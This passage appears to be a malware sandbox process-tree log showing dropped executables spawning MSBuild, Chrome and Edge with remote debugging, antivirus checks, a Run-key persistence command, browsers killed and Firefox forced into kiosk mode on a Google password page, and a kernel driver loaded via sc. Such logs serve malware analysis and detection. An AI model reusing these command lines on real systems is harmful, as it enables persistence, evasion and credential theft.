        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        12⤵
        
        PID:13164
        
        C:\Users\Admin\AppData\Local\2sjXuhCMete7.exe
        
        "C:\Users\Admin\AppData\Local\2sjXuhCMete7.exe"
        11⤵
        
        PID:17732
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        12⤵
        
        PID:24532
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        12⤵
        
        PID:24092
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        13⤵
        Uses browser remote debugging
        
        PID:9872
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x138,0x13c,0x140,0x114,0x144,0x7ffe72a5dcf8,0x7ffe72a5dd04,0x7ffe72a5dd10
        14⤵
        
        PID:12092
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1440,i,3240097394685496217,11444709323153720249,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2368 /prefetch:11
        14⤵
        
        PID:10140
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2340,i,3240097394685496217,11444709323153720249,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2336 /prefetch:2
        14⤵
        
        PID:4276
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=1980,i,3240097394685496217,11444709323153720249,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2752 /prefetch:13
        14⤵
        
        PID:18056
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3344,i,3240097394685496217,11444709323153720249,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3384 /prefetch:1
        14⤵
        Uses browser remote debugging
        
        PID:10020
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3320,i,3240097394685496217,11444709323153720249,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3340 /prefetch:1
        14⤵
        Uses browser remote debugging
        
        PID:6872
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4168,i,3240097394685496217,11444709323153720249,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3304 /prefetch:9
        14⤵
        Uses browser remote debugging
        
        PID:1080
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4732,i,3240097394685496217,11444709323153720249,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4760 /prefetch:1
        14⤵
        Uses browser remote debugging
        
        PID:18264
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5164,i,3240097394685496217,11444709323153720249,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5176 /prefetch:14
        14⤵
        
        PID:18120
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        13⤵
        Uses browser remote debugging
        
        PID:6688
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --edge-skip-compat-layer-relaunch
        14⤵
        Uses browser remote debugging
        
        PID:18360
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x2f0,0x7ffe67bcf208,0x7ffe67bcf214,0x7ffe67bcf220
        15⤵
        
        PID:9304
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1720,i,8547470382413008800,4594164954493828505,262144 --variations-seed-version --mojo-platform-channel-handle=2380 /prefetch:11
        15⤵
        
        PID:14352
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2304,i,8547470382413008800,4594164954493828505,262144 --variations-seed-version --mojo-platform-channel-handle=2088 /prefetch:2
        15⤵
        
        PID:6560
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2076,i,8547470382413008800,4594164954493828505,262144 --variations-seed-version --mojo-platform-channel-handle=2728 /prefetch:13
        15⤵
        
        PID:12980
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3472,i,8547470382413008800,4594164954493828505,262144 --variations-seed-version --mojo-platform-channel-handle=3536 /prefetch:1
        15⤵
        Uses browser remote debugging
        
        PID:14736
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3452,i,8547470382413008800,4594164954493828505,262144 --variations-seed-version --mojo-platform-channel-handle=3516 /prefetch:1
        15⤵
        Uses browser remote debugging
        
        PID:14904
        
        C:\Users\Admin\AppData\Local\PTLMXHZvOKjp.exe
        
        "C:\Users\Admin\AppData\Local\PTLMXHZvOKjp.exe"
        11⤵
        
        PID:5052
        
        C:\Users\Admin\AppData\Local\Temp\tpiyv2sr\BzBWMbOI9XWRJ0oW.exe
        
        C:\Users\Admin\AppData\Local\Temp\tpiyv2sr\BzBWMbOI9XWRJ0oW.exe 0
        12⤵
        
        PID:24404
        
        C:\Users\Admin\AppData\Local\Temp\tpiyv2sr\zyud62B6tx4Jqw7y.exe
        
        C:\Users\Admin\AppData\Local\Temp\tpiyv2sr\zyud62B6tx4Jqw7y.exe 24404
        13⤵
        
        PID:4344
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4344 -s 712
        14⤵
        Program crash
        
        PID:17716
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 24404 -s 808
        13⤵
        Program crash
        
        PID:17660
        
        C:\ProgramData\6ppppzmgdj.exe
        
        "C:\ProgramData\6ppppzmgdj.exe"
        9⤵
        
        PID:4728
        
        C:\Users\Admin\AppData\Local\Temp\xVXLFv5z\DLq5sdcjrtibokSJ.exe
        
        C:\Users\Admin\AppData\Local\Temp\xVXLFv5z\DLq5sdcjrtibokSJ.exe 0
        10⤵
        
        PID:6512
        
        C:\Users\Admin\AppData\Local\Temp\xVXLFv5z\OA6OKbTFZSLMVM9x.exe
        
        C:\Users\Admin\AppData\Local\Temp\xVXLFv5z\OA6OKbTFZSLMVM9x.exe 6512
        11⤵
        
        PID:868
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 868 -s 836
        12⤵
        Program crash
        
        PID:18076
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6512 -s 740
        11⤵
        Program crash
        
        PID:17612
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\gdtri" & exit
        9⤵
        
        PID:24136
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 11
        10⤵
        Delays execution with timeout.exe
        
        PID:17684
        
        C:\Users\Admin\AppData\Local\Temp\10028410101\alex12312321.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10028410101\alex12312321.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1888
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4964
        
        C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe"
        7⤵
        
        PID:3024
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        
        PID:8360
        
        C:\Users\Admin\AppData\Local\Temp\10046340101\8eee621e57.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10046340101\8eee621e57.exe"
        7⤵
        
        PID:14228
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c copy Bc.wbk Bc.wbk.bat & Bc.wbk.bat
        8⤵
        
        PID:3820
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        9⤵
        Enumerates processes with tasklist
        
        PID:11976
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        9⤵
        
        PID:408
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        9⤵
        Enumerates processes with tasklist
        
        PID:13480
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        9⤵
        
        PID:6160
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 674187
        9⤵
        
        PID:7272
        
        C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Funky.wbk
        9⤵
        
        PID:4320
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "Und" Tournament
        9⤵
        
        PID:8064
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 674187\Constraints.com + Lu + Pepper + Cn + Hairy + Nose + Providence + Bra + Corresponding + Promo + Ending 674187\Constraints.com
        9⤵
        
        PID:4624
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Losses.wbk + ..\Finally.wbk + ..\Medications.wbk + ..\Borough.wbk + ..\Trim.wbk + ..\Ellis.wbk + ..\Truly.wbk + ..\Was.wbk r
        9⤵
        
        PID:12988
        
        C:\Users\Admin\AppData\Local\Temp\674187\Constraints.com
        
        Constraints.com r
        9⤵
        
        PID:9380
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        9⤵
        
        PID:7576
        
        C:\Users\Admin\AppData\Local\Temp\10047850101\crypted.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10047850101\crypted.exe"
        7⤵
        
        PID:14208
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        
        PID:7860
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        
        PID:7596
        
        C:\Users\Admin\AppData\Local\Temp\10053180101\578d8c35bf.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10053180101\578d8c35bf.exe"
        7⤵
        
        PID:4088
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10053180101\578d8c35bf.exe"
        8⤵
        
        PID:13540
        
        C:\Users\Admin\AppData\Local\Temp\10053190101\b31f75b50d.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10053190101\b31f75b50d.exe"
        7⤵
        
        PID:11140
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10053190101\b31f75b50d.exe"
        8⤵
        
        PID:23852
    - - C:\Users\Admin\AppData\Local\Temp\10466830101\mTk60rz.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10466830101\mTk60rz.exe"
        5⤵
        
        PID:13816
      - C:\Users\Admin\AppData\Local\Temp\onefile_13816_133884104918269800\ZSoeRVBe.exe
        
        C:\Users\Admin\AppData\Local\Temp\10466830101\mTk60rz.exe
        6⤵
        
        PID:7260
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -c "Get-WmiObject -Query \"Select * from Win32_CacheMemory\""
        7⤵
        
        PID:10336
    - - C:\Users\Admin\AppData\Local\Temp\10469560101\YMauSAr.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10469560101\YMauSAr.exe"
        5⤵
        
        PID:5072
      - C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        6⤵
        
        PID:9196
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        7⤵
        
        PID:6180
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        8⤵
        
        PID:13628
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        9⤵
        
        PID:14316
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        10⤵
        
        PID:6204
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        11⤵
        
        PID:9308
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        12⤵
        
        PID:12940
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        13⤵
        
        PID:13420
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        14⤵
        
        PID:6056
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        15⤵
        
        PID:12996
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        16⤵
        
        PID:10456
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        17⤵
        
        PID:1836
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        18⤵
        
        PID:13424
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        19⤵
        
        PID:2172
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        20⤵
        
        PID:11472
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        21⤵
        
        PID:8704
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaservice_update.exe"
        22⤵
        Modifies registry key
        
        PID:17544
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaservice_update.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe\"'"
        22⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:24184
    - - C:\Users\Admin\AppData\Local\Temp\10472140101\VrQSuEQ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10472140101\VrQSuEQ.exe"
        5⤵
        
        PID:7520
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        
        PID:14788
    - - C:\Users\Admin\AppData\Local\Temp\10475710101\5uMVCoG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10475710101\5uMVCoG.exe"
        5⤵
        
        PID:12300
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        
        PID:2748
    - - C:\Users\Admin\AppData\Local\Temp\10476500101\42bf7fbd0f.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10476500101\42bf7fbd0f.exe"
        5⤵
        
        PID:10248
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        
        PID:11556
    - - C:\Users\Admin\AppData\Local\Temp\10476510101\39e4a54b26.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10476510101\39e4a54b26.exe"
        5⤵
        
        PID:24536
    - - C:\Users\Admin\AppData\Local\Temp\10476520101\4dbd718b06.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10476520101\4dbd718b06.exe"
        5⤵
        
        PID:24520
    - - C:\Users\Admin\AppData\Local\Temp\10476530101\0026010652.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10476530101\0026010652.exe"
        5⤵
        
        PID:17684
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        6⤵
        Kills process with taskkill
        
        PID:2492
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        6⤵
        Kills process with taskkill
        
        PID:18264
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        6⤵
        Kills process with taskkill
        
        PID:6240
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        6⤵
        Kills process with taskkill
        
        PID:17572
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM brave.exe /T
        6⤵
        Kills process with taskkill
        
        PID:8820
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
        6⤵
        
        PID:18204
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        7⤵
        
        PID:17676
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1976 -prefsLen 27097 -prefMapHandle 1980 -prefMapSize 270279 -ipcHandle 2068 -initialChannelId {60f931d2-b155-48b0-a483-a3ca2603327f} -parentPid 17676 -crashReporter "\\.\pipe\gecko-crash-server-pipe.17676" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
        8⤵
        
        PID:18392
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2448 -prefsLen 27133 -prefMapHandle 2452 -prefMapSize 270279 -ipcHandle 2460 -initialChannelId {436b16dd-a7d2-4ca6-8687-dbeae0ea6da0} -parentPid 17676 -crashReporter "\\.\pipe\gecko-crash-server-pipe.17676" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
        8⤵
        
        PID:11416
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3780 -prefsLen 25213 -prefMapHandle 3784 -prefMapSize 270279 -jsInitHandle 3788 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3796 -initialChannelId {c8e2a849-eb32-4082-865f-92b9047f2a77} -parentPid 17676 -crashReporter "\\.\pipe\gecko-crash-server-pipe.17676" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
        8⤵
        
        PID:4988
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3976 -prefsLen 27323 -prefMapHandle 3980 -prefMapSize 270279 -ipcHandle 4064 -initialChannelId {8b31ac43-6541-4388-92a8-c759fa215815} -parentPid 17676 -crashReporter "\\.\pipe\gecko-crash-server-pipe.17676" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
        8⤵
        
        PID:23888
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4492 -prefsLen 34822 -prefMapHandle 4496 -prefMapSize 270279 -jsInitHandle 4500 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 2864 -initialChannelId {74c00856-9969-4c69-b689-fbb42674431d} -parentPid 17676 -crashReporter "\\.\pipe\gecko-crash-server-pipe.17676" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
        8⤵
        
        PID:10204
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5168 -prefsLen 35010 -prefMapHandle 5176 -prefMapSize 270279 -ipcHandle 5228 -initialChannelId {211e201c-fa2b-41b2-952e-2319feecd8af} -parentPid 17676 -crashReporter "\\.\pipe\gecko-crash-server-pipe.17676" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
        8⤵
        
        PID:3060
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5632 -prefsLen 32952 -prefMapHandle 2924 -prefMapSize 270279 -jsInitHandle 5376 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4728 -initialChannelId {80d1a8a1-5b2c-4247-b91f-452e15548a20} -parentPid 17676 -crashReporter "\\.\pipe\gecko-crash-server-pipe.17676" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
        8⤵
        
        PID:10108
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5384 -prefsLen 32952 -prefMapHandle 5388 -prefMapSize 270279 -jsInitHandle 5392 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 2612 -initialChannelId {5b3b02e6-2abb-42a6-889c-4aea03f7bffa} -parentPid 17676 -crashReporter "\\.\pipe\gecko-crash-server-pipe.17676" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
        8⤵
        
        PID:14988
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5952 -prefsLen 32952 -prefMapHandle 5956 -prefMapSize 270279 -jsInitHandle 5960 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5968 -initialChannelId {f54ec129-14fb-4aed-bb04-7b212033aaa4} -parentPid 17676 -crashReporter "\\.\pipe\gecko-crash-server-pipe.17676" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
        8⤵
        
        PID:6588
    - - C:\Users\Admin\AppData\Local\Temp\10476540101\79037cc00e.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10476540101\79037cc00e.exe"
        5⤵
        
        PID:14180
      - C:\Users\Admin\AppData\Local\Temp\272.exe
        
        "C:\Users\Admin\AppData\Local\Temp\272.exe"
        6⤵
        
        PID:17580
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A5F1.tmp\A5F2.tmp\A612.bat C:\Users\Admin\AppData\Local\Temp\272.exe"
        7⤵
        
        PID:18104
        
        C:\Users\Admin\AppData\Local\Temp\272.exe
        
        "C:\Users\Admin\AppData\Local\Temp\272.exe" go
        8⤵
        
        PID:13804
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B63D.tmp\B63E.tmp\B63F.bat C:\Users\Admin\AppData\Local\Temp\272.exe go"
        9⤵
        
        PID:10168
        
        C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        10⤵
        Launches sc.exe
        
        PID:7680
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        10⤵
        Launches sc.exe
        
        PID:5496
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        10⤵
        Delays execution with timeout.exe
        
        PID:8436
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        10⤵
        Launches sc.exe
        
        PID:4688
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
